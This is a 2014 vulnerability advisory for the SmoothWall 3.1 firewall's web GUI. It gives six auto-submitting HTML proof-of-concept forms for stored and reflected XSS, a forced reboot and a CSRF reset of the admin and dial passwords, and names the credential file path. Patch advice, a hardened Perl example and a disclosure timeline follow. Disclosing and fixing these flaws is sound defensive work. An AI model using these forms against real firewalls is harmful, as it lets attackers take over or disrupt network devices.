SmoothWall 3.1 Cross Site Request Forgery / Cross Site Scripting

Posted Dec 22, 2014
Authored by Yann CAM

SmoothWall version 3.1 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
MD5 | e453929ef60fcd0ecf00e8d7a5b5b814

######################################################################
# Exploit Title: SmoothWall 3.1 Multiple vulnerabilities
# Date: 21/12/2014
# Author: Yann CAM @ Synetis
# Vendor or Software Link: www.smoothwall.org - www.smoothwall.org/download/
# Version: 3.1
# Category: CSRF password reset & XSS persistent
# Google dork:
# Tested on: Smoothwall Linux distribution
######################################################################


Smoothwall firewall/router distribution description :
======================================================================

Smoothwall is a Linux distribution designed to be used as an open source firewall. Designed for ease of use, Smoothwall is configured via a web-based GUI, and requires little or no knowledge of Linux to install or use.
Smoothwall is also a private software company based in the UK that develops firewall and web content filtering software, and which also maintains the SmoothWall open source project.

Version 3.0 SP3 contains many persistent XSS and CSRF vulnerabilities (tested in March 2013). Dave B. already published several XSS PoCs on January 17, 2011 (Exploit-DB 16006), and they have not been corrected.
This advisory adds new persistent XSS vectors and PoCs with a similar impact. SmoothWall 3.1, released in October 2014, is still affected by these attack vectors.

The SmoothWall WebGUI is protected only by HTTP Basic Auth (htaccess) and uses no session or anti-CSRF token. Because the browser attaches the cached Basic Auth credentials to every request to the WebGUI origin, any page that acts on POST parameters can be driven by a forged cross-site request.
The httpd daemon listens on port 81 for HTTP and port 441 for HTTPS.


Proof of Concept 1 :
======================================================================

Persistent XSS via POST: affects SmoothWall 3.0 SP3 and 3.1

File /httpd/cgi-bin/pppsetup.cgi line 365 :
print "\t<OPTION VALUE='$c' $selected{'PROFILE'}{$c}>$profilenames[$c]\n";

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/pppsetup.cgi' method='post'>
<input type='hidden' name='PROFILENAME' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='PROFILE' value='1' />
<input type='hidden' name='COMPORT' value='ttyS0' />
<input type='hidden' name='DTERATE' value='9600' />
<input type='hidden' name='TELEPHONE' value='' />
<input type='hidden' name='DIALMODE' value='T' />
<input type='hidden' name='MAXRETRIES' value='' />
<input type='hidden' name='TIMEOUT' value='' />
<input type='hidden' name='USERNAME' value='' />
<input type='hidden' name='PASSWORD' value='' />
<input type='hidden' name='AUTH' value='pap-or-chap' />
<input type='hidden' name='LOGINSCRIPT' value='' />
<input type='hidden' name='ACTION' value='Save' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

This XSS is persistent in the /cgi-bin/pppsetup.cgi page and in /cgi-bin/logs.cgi/log.dat, because the unescaped profile name is also written to the log through lines such as the following (file /httpd/cgi-bin/pppsetup.cgi, many occurrences):
&log("$tr{'profile deleted'} $pppsettings{'PROFILENAME'}");


Proof of Concept 2 :
======================================================================

Persistent XSS via POST: affects SmoothWall 3.0 SP3

File /httpd/cgi-bin/vpn.cgi/vpnconfig.dat line 258 :
<td colspan='3'><strong>$tr{'commentc'}</strong> $temp[8]</td>

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/vpn.cgi/vpnconfig.dat' method='post'>
<input type='hidden' name='SECRET1' value='x' />
<input type='hidden' name='SECRET2' value='x' />
<input type='hidden' name='COMMENT' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='ACTION' value='Add' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

Detail :
$temp[8] is not sanitized before being used, so the injected COMMENT is stored and rendered on every visit to this page. This is a persistent XSS.


Proof of Concept 3 :
======================================================================

Persistent XSS via POST: affects SmoothWall 3.0 SP3 and 3.1

File /httpd/cgi-bin/ddns.cgi line 273 :
&displaytable($filename, \%render_settings, $cgiparams{'ORDER'}, $cgiparams{'COLUMN'} );

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/ddns.cgi' method='post'>
<input type='hidden' name='COMMENT' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='ACTION' value='Add' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

Detail :
All POST parameters are passed to the &displaytable() function without any sanitization. The COMMENT variable allows a persistent XSS in this page.


Proof of Concept 4 :
======================================================================

Non-persistent (reflected) XSS via POST, from Dave B., not corrected since 2011. Affects SmoothWall 3.0 SP3 and 3.1.

File /httpd/cgi-bin/ipinfo.cgi line 76 and 101 :
&openbox("$addr ($hostname)");

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/ipinfo.cgi' method='post'>
<input type='hidden' name='IP' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='ACTION' value='Run' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

Detail :
$addr is not sanitized before being printed in the page. This is a non-persistent (reflected) XSS.

Proof of Concept 5 :
======================================================================

CSRF to reboot SmoothWall, from Dave B., not corrected since 2011. Affects SmoothWall 3.0 SP3 and 3.1.

File /httpd/cgi-bin/shutdown.cgi

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/shutdown.cgi' method='post'>
<input type='hidden' name='ACTION' value='Reboot' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>


Proof of Concept 6 :
======================================================================

CSRF to change the SmoothWall admin and dial passwords. Affects SmoothWall 3.0 SP3 and 3.1.

File /httpd/cgi-bin/changepw.cgi

The new password must be at least 6 alphanumeric characters.

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/changepw.cgi' method='post'>
<input type='hidden' name='ADMIN_PASSWORD1' value='newpassword' />
<input type='hidden' name='ADMIN_PASSWORD2' value='newpassword' />
<input type='hidden' name='DIAL_PASSWORD1' value='newpassword' />
<input type='hidden' name='DIAL_PASSWORD2' value='newpassword' />
<input type='hidden' name='ACTION_DIAL' value='Save' />
<input type='hidden' name='ACTION_ADMIN' value='Save' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>


How to prevent and protect against these vulnerabilities?
======================================================================

For example, for PoC 1 in the file /httpd/cgi-bin/pppsetup.cgi:

To protect SmoothWall from XSS, include the CGI module in the header of each vulnerable page (such as pppsetup.cgi):
use CGI qw(:standard);

Then, at line 365, escape the $profilenames[$c] variable like this:
print "\t<OPTION VALUE='$c' $selected{'PROFILE'}{$c}>" . escapeHTML($profilenames[$c]) . "\n";

And for the log page, escape the argument in every call to the log function in the file:
&log("$tr{'profile deleted'} " . escapeHTML($pppsettings{'PROFILENAME'}));

Finally, to prevent CSRF attacks, add a token mechanism on every page, or at least check the Referer of each request before using any POST variable (as the IPCop firewall/router distribution, originally a SmoothWall fork, does).
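The following is an added example written for this edit, not SmoothWall's or the advisory author's code. It shows a hardened skeleton for a WebGUI CGI such as pppsetup.cgi: the <OPTION> list is escaped at output time with CGI::escapeHTML, and every POST is gated by a Referer check (the IPCop approach) plus an anti-CSRF token. Because Basic Auth gives no session to bind a token to, the token is an HMAC of the authenticated user name under a server-side secret; the secret file path /var/smoothwall/auth/csrf.secret is a hypothetical location chosen for the example, and the profile names are constructed sample data.

```perl
#!/usr/bin/perl
# Added example, not SmoothWall code. Assumes CGI.pm and Digest::SHA are
# installed, the GUI runs on port 81/441 as in the advisory, and the CSRF
# secret lives in /var/smoothwall/auth/csrf.secret (hypothetical path).
use strict;
use warnings;
use CGI;
use Digest::SHA qw(hmac_sha256_hex);

my $SECRET_FILE = '/var/smoothwall/auth/csrf.secret';   # hypothetical

# Read the install-time secret; fail closed if it is missing or empty.
sub read_secret {
    my ($path) = @_;
    open(my $fh, '<', $path) or die "cannot read $path: $!\n";
    my $s = <$fh>;
    close($fh);
    chomp($s) if defined $s;
    die "empty secret in $path\n" unless defined $s && length $s;
    return $s;
}

# Basic Auth has no session, so bind the token to the authenticated user via
# an HMAC under the server-side secret; a cross-site page cannot compute it.
sub csrf_token_for {
    my ($user, $secret) = @_;
    return hmac_sha256_hex($user, $secret);
}

# Constant-time comparison of the submitted token with the expected one.
sub csrf_token_ok {
    my ($given, $user, $secret) = @_;
    return 0 unless defined $given && defined $user;
    my $expected = csrf_token_for($user, $secret);
    return 0 unless length($given) == length($expected);
    my $diff = 0;
    $diff |= ord(substr($given, $_, 1)) ^ ord(substr($expected, $_, 1))
        for 0 .. length($given) - 1;
    my $ok = ($diff == 0);
    return $ok ? 1 : 0;
}

# Referer check as in IPCop: the request must come from this host and port.
# The GUI listens on 81/441, so a genuine Referer always carries the port;
# a missing Referer is rejected (fail closed), which is acceptable for an admin GUI.
sub referer_is_local {
    my ($referer, $server_name, $server_port) = @_;
    return 0 unless defined $referer;
    my ($scheme, $host, $port) =
        $referer =~ m{^(https?)://([^/:?#]+)(?::(\d+))?(?:[/?#]|$)}i;
    return 0 unless defined $host;
    $port = (lc($scheme) eq 'https' ? 443 : 80) unless defined $port;
    my $ok = (lc($host) eq lc($server_name) && $port == $server_port);
    return $ok ? 1 : 0;
}

# Output-time escaping for the <OPTION> list that pppsetup.cgi line 365 prints
# raw. CGI::escapeHTML turns & < > " and ' into entities, so a name such as
# <script>alert(1)</script> is rendered as text, not executed.
sub render_profile_options {
    my ($names, $selected) = @_;
    my $html = '';
    for my $c (0 .. $#{$names}) {
        my $sel = (defined $selected && $selected == $c) ? 'SELECTED' : '';
        $html .= "\t<OPTION VALUE=\"$c\" $sel>" . CGI::escapeHTML($names->[$c]) . "\n";
    }
    return $html;
}

my $q      = CGI->new;
my $secret = read_secret($SECRET_FILE);
my $user   = $q->remote_user;   # set by the httpd from Basic Auth (REMOTE_USER)

unless (defined $user && length $user) {
    print $q->header(-status => '403 Forbidden', -type => 'text/plain');
    print "no authenticated user\n";
    exit 0;
}

if ($q->request_method eq 'POST') {
    # Gate every state change BEFORE any POST variable is used.
    unless (referer_is_local($q->referer, $q->server_name, $q->server_port)
            && csrf_token_ok(scalar $q->param('CSRFTOKEN'), $user, $secret)) {
        print $q->header(-status => '403 Forbidden', -type => 'text/plain');
        print "Cross-site request rejected\n";
        exit 0;
    }
    # ... only now read PROFILENAME etc. and save the profile ...
}

# Constructed sample data: the third name is the advisory's XSS payload.
my @profilenames = ('Default', 'Office', '<script>alert(/XSS/);</script>');

print $q->header(-type => 'text/html');
print "<form method='post' action='/cgi-bin/pppsetup.cgi'>\n";
print "<select name='PROFILE'>\n", render_profile_options(\@profilenames, 1), "</select>\n";
print "<input type='hidden' name='CSRFTOKEN' value='", csrf_token_for($user, $secret), "'>\n";
print "<input type='submit' name='ACTION' value='Save'>\n</form>\n";
```

To try it outside the httpd, create the secret file and run `REMOTE_USER=admin perl hardened.cgi` (CGI.pm reads REMOTE_USER from the environment); the rendered <OPTION> for the third profile contains `&lt;script&gt;` rather than a live tag. Two practitioner caveats: escaping is done at output time here, whereas the advisory's `&log(... escapeHTML(...))` escapes before writing to log.dat, which stores entities in the log file; escaping in logs.cgi when the log is displayed is the cleaner long-term fix. And a Referer check alone is weaker than a token, because some clients and proxies strip the header and because it relies on the browser sending it honestly; use it as defence in depth next to the token, not instead of it.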


Additional note :
======================================================================

Arbitrary files with attacker-controlled content can be uploaded to the system, but the uploaded file is always renamed to /var/smoothwall/adsl/mgmt.o, so its path cannot be chosen.
The upload form is here: http://SMOOTHWALL_IP:81/cgi-bin/alcateladslfw.cgi (it sits behind the same Basic Auth, so it is reachable by CSRF like the other pages).

The htpasswd file with the admin and dial credentials for WebGUI access is located at /var/smoothwall/auth/users


Solution:
======================================================================
2014-12-24 : None official. SmoothWall users must apply the patch themselves.


Report timeline :
======================================================================

2013-03-26 : Team alerted with details and PoC.
2013-04-09 : Second alert sent to the team.
2013-04-09 : First team response (06:00 pm), claiming to already know about these bugs and not to consider them issues.
2013-04-10 : Second team response (01:18 am), acknowledging the vulnerabilities but, I quote: "I was told that while this is a "potential" vulnerability it requires several things to happen for this to be an actual vulnerability."
2013-04-12 : My next response, with details on how to protect SmoothWall from these vulnerabilities and many links to CSRF attack references that rate them as critical.
2014-10-11 : SmoothWall 3.1 released, still affected by these issues.
2014-12-21 : Public advisory with some tips for patching manually (from Dave B.'s advisory in January 2011 to SmoothWall 3.1 in October 2014, there were no official patches).


Additional resources :
======================================================================

- www.smoothwall.org
- www.asafety.fr
- www.exploit-db.com/exploits/16006/
- www.securecoding.cert.org/confluence/display/perl/IDS33-PL.+Sanitize+untrusted+data+passed+across+a+trust+boundary


Credits :
======================================================================
Yann CAM - Security Consultant @ ASafety

--
CONTACT: www.asafety.fr